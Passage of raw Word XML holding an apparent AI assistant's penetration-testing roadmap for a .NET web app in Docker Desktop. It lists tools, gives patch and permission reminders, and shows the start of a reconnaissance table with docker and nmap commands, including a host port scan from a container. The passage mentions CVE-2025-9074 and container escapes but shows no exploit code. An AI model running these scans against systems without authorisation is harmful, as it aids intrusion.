        <w:t>: Python scripts for CVE-2025-9074, curl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A84C79">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Web Scanning</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>: OWASP ZAP, Burp Suite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618AAE6C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>.NET Analysis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>: ILSpy (if binaries are accessible), dotPeek</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205257BA">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Critical Reminders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11FC4307">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Update Docker Desktop</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve">: The most dangerous vulnerability listed (CVE-2025-9074) is fixed in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Docker Desktop 4.44.3+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>. Ensure your target is patched before testing, or document it as a critical finding if it isn't.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A42FD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Get Permission</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>: Attacking the Docker Engine API or attempting container escapes can crash the Docker daemon. Only perform these actions on applications you own.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56CB61AE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Focus on Configuration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>: Often, the biggest risks in containerized .NET apps aren't complex code exploits, but simple misconfigurations like exposing the debug interface (ASPNETCORE_ENVIRONMENT=Development) or running as root.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536F3A9C">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>If you'd like to dive deeper into a specific .NET vulnerability (like deserialization or SQLi) within this container context, just let me know.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2849D0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>I need phases and tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA493EB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Read 6 web pages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCB72D0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Here is your structured penetration testing roadmap for a .NET web application running in Docker Desktop, organized by phases with specific tools for each stage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31008A9A">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:pict>
          <v:rect id="_x0000_i1026" o:spt="1" style="height:1.5pt;width:0pt;" fillcolor="#A0A0A0" filled="t" stroked="f" coordsize="21600,21600" o:hr="t" o:hrstd="t">
            <v:path/>
            <v:fill on="t" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata o:title=""/>
            <o:lock v:ext="edit"/>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:rect>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD2054A">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1: Reconnaissance &amp; Information Gathering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2021F5CD">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Before attacking, you must understand what you're targeting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51DF6E26">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Objectives:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="12"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblCellSpacing w:w="15" w:type="dxa"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="autofit"/>
        <w:tblCellMar>
          <w:top w:w="15" w:type="dxa"/>
          <w:left w:w="15" w:type="dxa"/>
          <w:bottom w:w="15" w:type="dxa"/>
          <w:right w:w="15" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3169"/>
        <w:gridCol w:w="5227"/>
      </w:tblGrid>
      <w:tr w14:paraId="61B63797">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="15" w:type="dxa"/>
            <w:left w:w="15" w:type="dxa"/>
            <w:bottom w:w="15" w:type="dxa"/>
            <w:right w:w="15" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="039175E2">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7E641CEA">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Why It Matters</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="22B51E73">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="15" w:type="dxa"/>
            <w:left w:w="15" w:type="dxa"/>
            <w:bottom w:w="15" w:type="dxa"/>
            <w:right w:w="15" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="267F7BFE">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Map container network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="03C4747A">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Identify open ports, linked services, host communication paths</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0E5496F0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="15" w:type="dxa"/>
            <w:left w:w="15" w:type="dxa"/>
            <w:bottom w:w="15" w:type="dxa"/>
            <w:right w:w="15" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="195DE91D">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Discover API endpoints</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="42C4AE04">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Swagger/OpenAPI often exposed in .NET Core apps</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="26DF6064">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="15" w:type="dxa"/>
            <w:left w:w="15" w:type="dxa"/>
            <w:bottom w:w="15" w:type="dxa"/>
            <w:right w:w="15" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5E2F339A">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Identify environment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="53DB808C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Detect Development vs Production settings</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="48BF9ABA">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="15" w:type="dxa"/>
            <w:left w:w="15" w:type="dxa"/>
            <w:bottom w:w="15" w:type="dxa"/>
            <w:right w:w="15" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="62819486">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Capture authentication mechanism</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="202BBB5D">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>JWT tokens, cookies, or API keys</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="799FB765">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Tools to Use:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="12"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblCellSpacing w:w="15" w:type="dxa"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="autofit"/>
        <w:tblCellMar>
          <w:top w:w="15" w:type="dxa"/>
          <w:left w:w="15" w:type="dxa"/>
          <w:bottom w:w="15" w:type="dxa"/>
          <w:right w:w="15" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1280"/>
        <w:gridCol w:w="1587"/>
        <w:gridCol w:w="5529"/>
      </w:tblGrid>
      <w:tr w14:paraId="245CCD1D">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="15" w:type="dxa"/>
            <w:left w:w="15" w:type="dxa"/>
            <w:bottom w:w="15" w:type="dxa"/>
            <w:right w:w="15" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7F4B981F">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1217D5F9">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="37787CE9">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Command / Usage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6B368C66">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="15" w:type="dxa"/>
            <w:left w:w="15" w:type="dxa"/>
            <w:bottom w:w="15" w:type="dxa"/>
            <w:right w:w="15" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="17359C8B">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>docker ps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7EC32D26">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>List running containers from host</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="20A814E6">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>docker ps --format "table {{.Names}}\t{{.Ports}}"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3647C8A8">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="15" w:type="dxa"/>
            <w:left w:w="15" w:type="dxa"/>
            <w:bottom w:w="15" w:type="dxa"/>
            <w:right w:w="15" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="26B524E2">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>docker inspect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0E54C773">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Get container config (volumes, env vars, network)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="657435FB">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>docker inspect &lt;container_name&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1F299976">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="15" w:type="dxa"/>
            <w:left w:w="15" w:type="dxa"/>
            <w:bottom w:w="15" w:type="dxa"/>
            <w:right w:w="15" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7AE9B323">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>nmap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="728A4B4F">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Port scan from inside container</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3E7810CF">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>nmap -p- 172.17.0.1 (scans host from container)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
